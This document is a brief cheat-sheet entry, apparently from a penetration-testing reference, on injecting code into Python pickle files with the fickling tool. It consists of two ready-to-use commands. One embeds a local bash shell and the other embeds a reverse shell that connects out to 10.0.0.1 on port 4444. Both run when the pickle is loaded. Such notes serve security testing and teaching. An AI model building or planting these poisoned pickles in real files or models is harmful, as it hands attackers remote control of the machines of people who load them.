Pickle Code Injection
Last modified: 2024-07-17
Exploit
fickling --inject "import os; os.system('/bin/bash')" example.pkl
# Reverse shell (replace "10.0.0.1" and 4444 with your own)
fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl